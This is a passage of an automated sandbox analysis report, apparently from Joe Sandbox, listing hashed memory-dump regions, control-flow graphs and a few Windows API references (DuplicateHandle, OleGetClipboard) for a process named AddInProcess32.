            • Snapshot File: hcaresult_9_2_6420000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cec1d36915af4669795c068137e0a15f5dc56cef49630a6e7371d8aa10b6dc8d
            • Instruction ID: 79c8b9744483db1b29bc7fcfe2c2b0f92fb26e33d0f32145e10b992eb75644cc
            • Opcode Fuzzy Hash: cec1d36915af4669795c068137e0a15f5dc56cef49630a6e7371d8aa10b6dc8d
            • Instruction Fuzzy Hash: 11028530B0071A8BDB59EA79C46077E72E3BBC9610FB4892AD406DB384DF76DC069791
            Memory Dump Source
            • Source File: 00000009.00000002.1745671419.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6420000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f68b7549c59979de4b88c54288e284fd7de3924efb0509c478f6f057710566a1
            • Instruction ID: 6c9140f21704621692f65da3a8e2e2fe7f11e43b0f1bb341763e0e590548f86a
            • Opcode Fuzzy Hash: f68b7549c59979de4b88c54288e284fd7de3924efb0509c478f6f057710566a1
            • Instruction Fuzzy Hash: 1A02C370D00229CFEB65DFA8C981B9EBBF1FF49300F1085AAD449A7250EB749A85CF55
            Memory Dump Source
            • Source File: 00000009.00000002.1745671419.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6420000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3e9d0e9ab0c0084e03d459a13e381414098945a79687e5e0dd492a5d2122a602
            • Instruction ID: eb7710826f43341a808a359a9d674b741c359d8268ac10ec1592c61b0d8ca9ee
            • Opcode Fuzzy Hash: 3e9d0e9ab0c0084e03d459a13e381414098945a79687e5e0dd492a5d2122a602
            • Instruction Fuzzy Hash: 73F1E370D00229CFEB64DFA8D881B9EBBF1BF48300F2095AAD409A7350EB749985CF55
            Memory Dump Source
            • Source File: 00000009.00000002.1748805800.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6700000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7eb2aba7b9f965fec2639bdc34dae1e655f492246b6a2140369a088904bad34c
            • Instruction ID: 198cb79557a398835fc56bb30be20b0a61f47aa39d29b9356c57fa04bd69080a
            • Opcode Fuzzy Hash: 7eb2aba7b9f965fec2639bdc34dae1e655f492246b6a2140369a088904bad34c
            • Instruction Fuzzy Hash: 56C12674E002189FDF54DFA9D844AAEBBF6FF49310F10842AE905EB350D775A901CBA1
            Memory Dump Source
            • Source File: 00000009.00000002.1679595175.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1690000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 41eb3778d7ae50bf01a2406cb9137c50681ce967905e217aeb680edf6c1ea3b8
            • Instruction ID: 7249dbbf056b3ff9aab6bf0a1582382eb866abcaaad7257ad84ff4c50909aa63
            • Opcode Fuzzy Hash: 41eb3778d7ae50bf01a2406cb9137c50681ce967905e217aeb680edf6c1ea3b8
            • Instruction Fuzzy Hash: F5C1BB74D16229CFDB65CF28CD887E9BBB5AF8A311F1091EAD409A7250DB349AC5CF40
            Memory Dump Source
            • Source File: 00000009.00000002.1750044631.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_67f0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 522e0646081b16781765acdad0e30a9aa60f342d8d50ba28dbaf339a9d07ed47
            • Instruction ID: 36488f087a30a9a6b93fc3a06fe18aaf546940a64b7fa5adab6e54d0c517dcea
            • Opcode Fuzzy Hash: 522e0646081b16781765acdad0e30a9aa60f342d8d50ba28dbaf339a9d07ed47
            • Instruction Fuzzy Hash: 13D12BB08A0749EFD710DF64E848A993BB2BB85314F30C219D361AF2D2D7B5584ACF59
            Memory Dump Source
            • Source File: 00000009.00000002.1679595175.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1690000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 025e942f3bdd009503bc18aad166f8ba06371b8ed664b5aea1337233dc50b1cf
            • Instruction ID: c88dcee498baa3768cf38769456c1ee3469af54e02e71bf2bcdb76bfd257f085
            • Opcode Fuzzy Hash: 025e942f3bdd009503bc18aad166f8ba06371b8ed664b5aea1337233dc50b1cf
            • Instruction Fuzzy Hash: C761BD74E05229CFDB64CF29CC447E9B7B5AF8A300F5591EA940DAB360DB349A85CF40
            Memory Dump Source
            • Source File: 00000009.00000002.1679595175.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1690000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: faef7445f5892983f8453276d0be4bd4a96da5fa9dc6d5587922be5503f6cd9e
            • Instruction ID: 7cb99d97b80e90041cbb70d29a0711c46bfdc2cf5af3035af12d46d2dffcd979
            • Opcode Fuzzy Hash: faef7445f5892983f8453276d0be4bd4a96da5fa9dc6d5587922be5503f6cd9e
            • Instruction Fuzzy Hash: E451E570D05319CBEF24CF66C9447AABABABF9A300F1091A9C408A7255D7794A85CF51
            Memory Dump Source
            • Source File: 00000009.00000002.1679595175.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1690000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c116aa30acfd7e7665aa4439d4a261e00d3cd5fdc4e1b0d6c7c142e36e64c60a
            • Instruction ID: 4acab7f520b5c2553f41594a65a72ead548abe64a15fe19f4ec82a02815070cd
            • Opcode Fuzzy Hash: c116aa30acfd7e7665aa4439d4a261e00d3cd5fdc4e1b0d6c7c142e36e64c60a
            • Instruction Fuzzy Hash: 4C619B74E05629CFDB64CF29CC44BE9B7B5AF8A300F5591EA940DAB360DB309A85CF40
            Memory Dump Source
            • Source File: 00000009.00000002.1679595175.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1690000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0b5f5d7880cebf2a298535f0f262eaf40f09b008240bfc44fbb5e203898175ca
            • Instruction ID: c92ab96102cb8f7ef0cc5f4ee655f21743926929f5f219b9ae507e9fe6d8ee1d
            • Opcode Fuzzy Hash: 0b5f5d7880cebf2a298535f0f262eaf40f09b008240bfc44fbb5e203898175ca
            • Instruction Fuzzy Hash: 3941CDB0D06248DFDF15CFAAD8542ECBBFAAF8A314F14C06AD424B6215D774044ACF24
            Memory Dump Source
            • Source File: 00000009.00000002.1679595175.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1690000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b9e086475e56c61348b2aec6d5a465b102f2756e1a436c74be5f4aa8039880a1
            • Instruction ID: da134cfdc183f0ddb63f387ee130a83a24a930ef50eaee684cfd0b016b87b699
            • Opcode Fuzzy Hash: b9e086475e56c61348b2aec6d5a465b102f2756e1a436c74be5f4aa8039880a1
            • Instruction Fuzzy Hash: EF418AB4D15208DBDF14CFAED9886EDBBFABB8A314F10D029D428B6215E774144ACF24

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 2776 6846e18-6846e60 2782 6846e65-6846e68 call 68490f0 2776->2782 2783 6846e6e-6846ece 2782->2783 2792 6846ed6-6846edf call 6849300 2783->2792 2794 6846ee8-6846f7c 2792->2794 2805 6846f81-6846f93 2794->2805 2808 6846f9c-6846fea 2805->2808 2815 6846ff2-6846ff5 call 6849f20 2808->2815 2816 6846ffb-68470a2 2815->2816 2829 68470ab 2816->2829 2830 68470b4-68470bd 2829->2830 2832 68470c6-68470e1 2830->2832 2834 68470ed-6847122 2832->2834 2839 684712e 2834->2839 2840 684713a-6847164 2839->2840 2844 684716e-6847180 2840->2844 2845 684718c-68471ef 2844->2845 2851 68471f4 2845->2851 2852 6847200-6847298 2851->2852 2863 68472a4 2852->2863 2864 68472b0-684736a 2863->2864 2876 6847376 2864->2876 2877 6847382 2876->2877 2878 684738e-68473ac 2877->2878 2880 68473b8-68473eb 2878->2880 2884 68473f6 2880->2884 2885 6847402-68474c3 2884->2885 2897 68474c8-68474e0 call 684dac1 2885->2897 2900 68474ec-68475ac 2897->2900 2913 68475b6-68475c8 2900->2913 2914 68475d4-6847637 2913->2914 2920 684763c-6847648 call 684e021 2914->2920 2922 6847654-68476c9 2920->2922 2930 68476d4-68476da call 684e259 2922->2930 2931 68476e0-68477a1 2930->2931 2943 68477a6-68477b2 call 684e458 2931->2943 2945 68477be 2943->2945 2946 68477ca 2945->2946 2947 68477d6-6847833 2946->2947 2953 684783e-684784a call 684e690 2947->2953 2955 6847856-6847a75 2953->2955 2989 6847a7a-6847a86 call 684ecc1 2955->2989 2991 6847a92-6847aaa 2989->2991 2994 6847ab6-6847ac8 2991->2994 2995 6847ad4-6847c14 2994->2995 3017 6847c20-6847c32 2995->3017 3018 6847c3e-6847c71 3017->3018 3022 6847c7c 3018->3022 3023 6847c88-6847d49 3022->3023 3035 6847d4e 3023->3035 3381 6847d54 call 68c001f 3035->3381 3382 6847d54 call 68c0040 3035->3382 3036 6847d5a-684801d 3081 6848022 3036->3081 3377 6848028 call 68c0840 3081->3377 3378 6848028 call 68c0850 3081->3378 3379 6848028 call 68c0813 3081->3379 3082 684802e-6848247 3117 6848253 3082->3117 3118 684825f-68489a6 3117->3118 3241 68489b2 3118->3241 3242 68489be-6848b59 3241->3242 3271 6848b65 3242->3271 3272 6848b71-6848e65 3271->3272 3325 6848e6a 3272->3325 3326 6848e76-6848fd4 3325->3326 3352 6848fe0-6848ff2 3326->3352 3353 6848ffe-68490de 3352->3353 3377->3082 3378->3082 3379->3082 3381->3036 3382->3036
            Memory Dump Source
            • Source File: 00000009.00000002.1751096450.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6840000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5733a55c238a1a6e513f9ed0b2775e8a7e836a2a655194e56d8d93bbac2fc222
            • Instruction ID: 9a2b1ba5923cb3e7b8631d68bf094430cebe31fe73538686c04eeca15119798f
            • Opcode Fuzzy Hash: 5733a55c238a1a6e513f9ed0b2775e8a7e836a2a655194e56d8d93bbac2fc222
            • Instruction Fuzzy Hash: 38238BB4D01229CFCF64AF74DC48A9DBBB6BF49201F1085E9EA09A7250DB359E91CF40

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 3383 6846e28-6847d4e call 68490f0 call 6849300 call 6849f20 call 684dac1 call 684e021 call 684e259 call 684e458 call 684e690 call 684ecc1 3980 6847d54 call 68c001f 3383->3980 3981 6847d54 call 68c0040 3383->3981 3642 6847d5a-6848022 3976 6848028 call 68c0840 3642->3976 3977 6848028 call 68c0850 3642->3977 3978 6848028 call 68c0813 3642->3978 3688 684802e-6848ff2 3959 6848ffe-68490de 3688->3959 3976->3688 3977->3688 3978->3688 3980->3642 3981->3642
            Memory Dump Source
            • Source File: 00000009.00000002.1751096450.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6840000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4076d4c0e8e2d9927ffde15b1d908e9ebb33c7348b9de48b554cc303dd0a7982
            • Instruction ID: 8dc3614312a035366de8b09a47d23567ec0f44e90ae579d0283be93a8ec40f30
            • Opcode Fuzzy Hash: 4076d4c0e8e2d9927ffde15b1d908e9ebb33c7348b9de48b554cc303dd0a7982
            • Instruction Fuzzy Hash: 38238BB4D01229CFCF64AF74DC48A9DBBB6BF49201F1085E9EA09A7250DB359E91CF40

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 3989 670e9f8-670e9fa 3990 670ea02-670ea23 3989->3990 3991 670e9fc 3989->3991 3994 670ea25-670ea28 3990->3994 3991->3990 3995 670ea54-670ea56 3994->3995 3996 670ea2a-670ea4f 3994->3996 3997 670ea58 3995->3997 3998 670ea5d-670ea60 3995->3998 3996->3995 3997->3998 3998->3994 4000 670ea62-670eb0a 3998->4000 4013 670eb15 4000->4013 4014 670eb20-670eb38 4013->4014 4017 670f182-670f19b 4014->4017 4018 670eb3e 4014->4018 4020 670f1a6 4017->4020 4021 670f19d 4017->4021 4022 670eb46-670eb48 4018->4022 4025 670f1a7 4020->4025 4021->4020 4023 670eb60-670ebef 4022->4023 4024 670eb4a-670eb50 4022->4024 4039 670ecb3 4023->4039 4040 670ebf5-670ecaa 4023->4040 4026 670eb52 4024->4026 4027 670eb54-670eb56 4024->4027 4025->4025 4026->4023 4027->4023 4041 670ecb8 4039->4041 4040->4039 4043 670ecc0-670ed30 4041->4043 4063 670edf4-670ee70 4043->4063 4064 670ed36-670edeb 4043->4064 4088 670ee76-670f00f 4063->4088 4089 670f018-670f095 4063->4089 4064->4063 4088->4089 4113 670f159-670f17c 4089->4113 4114 670f09b-670f150 4089->4114 4113->4017 4113->4018 4114->4113
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.1748805800.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6700000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: q
            • API String ID: 0-4110462503
            • Opcode ID: ad28a023c7f138407ed9bae209cb69926ac8801a376c6473d301bce6ba8562f9
            • Instruction ID: 1e4802a7fa2023d53e5e3f26c46b675f0db7f2479886178557c09616f34f161a
            • Opcode Fuzzy Hash: ad28a023c7f138407ed9bae209cb69926ac8801a376c6473d301bce6ba8562f9
            • Instruction Fuzzy Hash: CB22D374E00229CFDF64AF74D848A9EBBB6BF49340F1045A9E90AA7350DB759E81CF50

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 4145 6835db1-6835e93 DuplicateHandle 4146 6835e95-6835e9b 4145->4146 4147 6835e9c-6835edc 4145->4147 4146->4147
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06835E83
            Memory Dump Source
            • Source File: 00000009.00000002.1750605108.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6830000_AddInProcess32.jbxd
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 99e0bcf69bab4b788d5ef927882d3080984e13749a93e7c7caa8c40b1ed986b6
            • Instruction ID: e6ef1811087c0407d7ec467af7f6a9ba16f1986743831f060830f00a8d0507db
            • Opcode Fuzzy Hash: 99e0bcf69bab4b788d5ef927882d3080984e13749a93e7c7caa8c40b1ed986b6
            • Instruction Fuzzy Hash: 394176B9D003589FDB10CFA9D884ADEBBF5BB09310F24902AE918AB310D335A945CF94

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 4151 6835db8-6835e93 DuplicateHandle 4152 6835e95-6835e9b 4151->4152 4153 6835e9c-6835edc 4151->4153 4152->4153
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06835E83
            Memory Dump Source
            • Source File: 00000009.00000002.1750605108.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6830000_AddInProcess32.jbxd
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: f024505f138d9aae047a3eba916ccff076e9ec7b9a3ae57c530a3a0c7e1e1f31
            • Instruction ID: 9f3b49e83859b52da108dbf4606e39280d5aa7ce33558c93512d5a4d18ff61d6
            • Opcode Fuzzy Hash: f024505f138d9aae047a3eba916ccff076e9ec7b9a3ae57c530a3a0c7e1e1f31
            • Instruction Fuzzy Hash: C64164B9D003589FDB10CFAAD984ADEBBF5BB09310F14902AE918AB310D335A945CF94

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 4157 683699c-6836a22 4160 6836a2a-6836a72 OleGetClipboard 4157->4160 4161 6836a74-6836a7a 4160->4161 4162 6836a7b-6836aa3 4160->4162 4161->4162 4165 6836aaa-6836ab4 4162->4165 4166 6836abc-6836af5 4165->4166 4169 6836af7-6836afb 4166->4169 4170 6836b05 4166->4170 4169->4170 4171 6836afd 4169->4171 4172 6836b06 4170->4172 4171->4170 4172->4172
            APIs
            Memory Dump Source
            • Source File: 00000009.00000002.1750605108.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6830000_AddInProcess32.jbxd
            Similarity
            • API ID: Clipboard
            • String ID:
            • API String ID: 220874293-0
            • Opcode ID: ed04566ac63a9350488db3851368ce29f63f6b0ae5f0b5563439a5d55ccac4c4
            • Instruction ID: 36cbb10bb1d17b36f3573b4f27c1331a6990704f997920b9ea3556b43476c2c6
            • Opcode Fuzzy Hash: ed04566ac63a9350488db3851368ce29f63f6b0ae5f0b5563439a5d55ccac4c4
            • Instruction Fuzzy Hash: BB41ACB0D01258DFDB14DFA9C984BDEBBF1AF48300F20812AE405BB260EB749985CF95

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 4173 68369a8-6836a72 OleGetClipboard 4177 6836a74-6836a7a 4173->4177 4178 6836a7b-6836ab4 4173->4178 4177->4178 4182 6836abc-6836af5 4178->4182 4185 6836af7-6836afb 4182->4185 4186 6836b05 4182->4186 4185->4186 4187 6836afd 4185->4187 4188 6836b06 4186->4188 4187->4186 4188->4188
            APIs
            Memory Dump Source
            • Source File: 00000009.00000002.1750605108.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6830000_AddInProcess32.jbxd
            Similarity
            • API ID: Clipboard
            • String ID:
            • API String ID: 220874293-0
            • Opcode ID: 8487b1b693bd6173f083f19bb0237da00b86579cbee2ee98cf3f7de65c8cd755
            • Instruction ID: 29af7497f27b5a17a1a298ca23808667dc598c1d750f99752f011bda54b4a1f2
            • Opcode Fuzzy Hash: 8487b1b693bd6173f083f19bb0237da00b86579cbee2ee98cf3f7de65c8cd755
            • Instruction Fuzzy Hash: 00419BB4D00258DFDB14DFE9C984B9EBBF5AF48700F20802AE504BB260EB759985CF94

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 4204 1696be1-1696c0b 4205 1696c0d-1696c10 4204->4205 4206 16986cb-16986ce 4205->4206 4207 1696c16-1697db0 4205->4207 4208 16986e8-16986eb 4206->4208 4209 16986d0-16986e3 4206->4209 4750 1697db6 call 169cb48 4207->4750 4751 1697db6 call 169ca20 4207->4751 4752 1697db6 call 169ca10 4207->4752 4211 16986fb-16986fd 4208->4211 4212 16986ed-16986f6 4208->4212 4209->4208 4214 16986ff 4211->4214 4215 1698704-1698707 4211->4215 4212->4211 4214->4215 4215->4205 4218 169870d-1698742 4215->4218 4574 1697dbc-1698398 4686 16983a4-16986c6 4574->4686 4686->4206 4750->4574 4751->4574 4752->4574
            Memory Dump Source
            • Source File: 00000009.00000002.1679595175.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1690000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fd1154b4db2fce9bb02d3193d208a0b27927b81d2f6ef30ab914c5fec9346dff
            • Instruction ID: 37ce845a2fbe11adde6bb0e2531a48583414dd154423a3ceedde615f03a47daf
            • Opcode Fuzzy Hash: fd1154b4db2fce9bb02d3193d208a0b27927b81d2f6ef30ab914c5fec9346dff
            • Instruction Fuzzy Hash: 1FF28175E002299FCF649FB8E84CA9DBBB5BF48311F1044A9E90AE7354DB358A91CF50
            APIs
            Memory Dump Source
            • Source File: 00000009.00000002.1750605108.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6830000_AddInProcess32.jbxd
            Similarity
            • API ID: Initialize
            • String ID:
            • API String ID: 2538663250-0
            • Opcode ID: 4530ea6d12038090bcd0ba4d99d771b7260b9aac24bb6348c78d2993c7dfca19
            • Instruction ID: ff0365c33eb550b8c3c10c0b8a8a495d0372cd25999feb2ad83610383089ba37
            • Opcode Fuzzy Hash: 4530ea6d12038090bcd0ba4d99d771b7260b9aac24bb6348c78d2993c7dfca19
            • Instruction Fuzzy Hash: FE31ABB8D0021CAFDB10CFA9D484A9EFBF4EB09314F10945AE914B7310D775A841CFA4
            APIs
            Memory Dump Source
            • Source File: 00000009.00000002.1750605108.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6830000_AddInProcess32.jbxd
            Similarity
            • API ID: Initialize
            • String ID:
            • API String ID: 2538663250-0
            • Opcode ID: ee58937494a148261c2b2b0898297a18259e7c5b27752711dfb9294e2cd2a716
            • Instruction ID: 85fbfbedbdcd22826ee858a00f81375918dcb63edee493f19af8b37f98f16679
            • Opcode Fuzzy Hash: ee58937494a148261c2b2b0898297a18259e7c5b27752711dfb9294e2cd2a716
            • Instruction Fuzzy Hash: 3531A9B8D01218AFCB14CFA9D884A9EFBF4BB49314F10941AE814B3310D775A841CFA8
            Memory Dump Source
            • Source File: 00000009.00000002.1752890537.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_68c0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 33424b496954a89e3124c3d87ff7701113a5d23f20753613daa59ba8ef191367
            • Instruction ID: bcb543f15ad558d96f0767bfdbd846b84c1eca2398116cfda0cd64349e6f7a46
            • Opcode Fuzzy Hash: 33424b496954a89e3124c3d87ff7701113a5d23f20753613daa59ba8ef191367
            • Instruction Fuzzy Hash: 9CC2A474E00229DFCF54AFB4D84CA9DBBB6BF49351F5048A9EA0AE7350DB3589818F50
            Memory Dump Source
            • Source File: 00000009.00000002.1752890537.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_68c0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8ecf851005984d33c51cb0e6560f82ffb83aeff1c34be9f278b2327dd7964f3a
            • Instruction ID: a13c806cf5227d0b1eb0daca9ee4fd05005ec9f5a51878fab308c5c27846a4a1
            • Opcode Fuzzy Hash: 8ecf851005984d33c51cb0e6560f82ffb83aeff1c34be9f278b2327dd7964f3a
            • Instruction Fuzzy Hash: CBC2A674E00229DFCF54AFB4D84CA9DBBB6BF49351F5048A9EA0AE7350DB3589818F50
            Memory Dump Source
            • Source File: 00000009.00000002.1747048865.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_65d0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ce5161110ba2d206a227fb0ef0c8e95883d04bc1b1ddef900f8da0c4484133ef
            • Instruction ID: 87a8eaf6fcf66eb8cfde9390ebaccdc6a456f1cc7d9f97e9e7adfb8611ef0a3b
            • Opcode Fuzzy Hash: ce5161110ba2d206a227fb0ef0c8e95883d04bc1b1ddef900f8da0c4484133ef
            • Instruction Fuzzy Hash: 3EC2C574E012298FCF65AFB8E85C69DBBB6BF48314F1049A9D809A7354DB359E81CF40
            Memory Dump Source
            • Source File: 00000009.00000002.1747048865.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_65d0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6485bd9d0f4d47f326a5527a3dbeea3071921a380b8030f802c05195ccb3ef8e
            • Instruction ID: 2afbf945a4bdd8156cfff3d173fbde2673a94b6ff7c1d3d7eeefec0a32f08dc9
            • Opcode Fuzzy Hash: 6485bd9d0f4d47f326a5527a3dbeea3071921a380b8030f802c05195ccb3ef8e
            • Instruction Fuzzy Hash: B9C2C574E012298FCF65AFB8E85C69DBBB6BF48314F1049A9D809A7354DB359E81CF40
            Memory Dump Source
            • Source File: 00000009.00000002.1748175670.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_66f0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a7a7409c1adfbad589bdc4a60b6d7a4c78f0c557e37591d7892e6b2a70672e8b
            • Instruction ID: 95ea45dd2ef5e3025fea265102a904826c4e8d2da2ec059d012d870b6a7f8bcb
            • Opcode Fuzzy Hash: a7a7409c1adfbad589bdc4a60b6d7a4c78f0c557e37591d7892e6b2a70672e8b
            • Instruction Fuzzy Hash: F2927D74E00229CFCB64EFA4D848A9DBBB6BF49301F5045E9E949AB350DB759E81CF40
            Memory Dump Source
            • Source File: 00000009.00000002.1748805800.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6700000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 25691fa262732b718991b1c08fb4b60db6761c9e7d43b806fb2ae468b1aa0da3
            • Instruction ID: 614e1fefefa5491958b431034a200e97d14e50255c3bb0503b809132fedceea9
            • Opcode Fuzzy Hash: 25691fa262732b718991b1c08fb4b60db6761c9e7d43b806fb2ae468b1aa0da3
            • Instruction Fuzzy Hash: 2862F675A00328DFDF54AFB4D84CA9DBABABF88341F5048A9E60AE7350DF7589418F50
            Memory Dump Source
            • Source File: 00000009.00000002.1748805800.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6700000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 352832bea505223182e1b09ae350160df0b33bae93dbc0755832fb87eb4f7f80
            • Instruction ID: 7753f4f9391edcd26be6633858fdbbcee90b8efc7e20ee2fa2df4931ac738570
            • Opcode Fuzzy Hash: 352832bea505223182e1b09ae350160df0b33bae93dbc0755832fb87eb4f7f80
            • Instruction Fuzzy Hash: FC62E575A00328CFDF54AFB4D84CA9DBABABF88341F5048A9E60AE7350DF7589418F51
            Memory Dump Source
            • Source File: 00000009.00000002.1748175670.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_66f0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bfe96c300b8f79c3c6f02572044138f8b11ff28cf4c2b260b2b9e66b5b7913ae
            • Instruction ID: 7581fdba83e27b23a894a54393fa4406f053d8d92385bc43907b1f58cdf94170
            • Opcode Fuzzy Hash: bfe96c300b8f79c3c6f02572044138f8b11ff28cf4c2b260b2b9e66b5b7913ae
            • Instruction Fuzzy Hash: 1162C174E402299FCB54AFB4D84CA9DBBB6BF49341F1084A9EA4AE7350DB358D81CF40
            Memory Dump Source
            • Source File: 00000009.00000002.1748175670.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_66f0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 52f57e7a385ea2f8b3202a56e8d12ff64d7b0e008d6a8b0a888276ac677e5b8d
            • Instruction ID: 0904290cb2c7008f109d8ef5b24e0bec6168a071c6999bb1e977f77c6cde2ee7
            • Opcode Fuzzy Hash: 52f57e7a385ea2f8b3202a56e8d12ff64d7b0e008d6a8b0a888276ac677e5b8d
            • Instruction Fuzzy Hash: AC62C174E402298FDB54AFB4D84CA9DBBB6BF49341F1084A9EA4AE7350DB358D81CF50
            Memory Dump Source
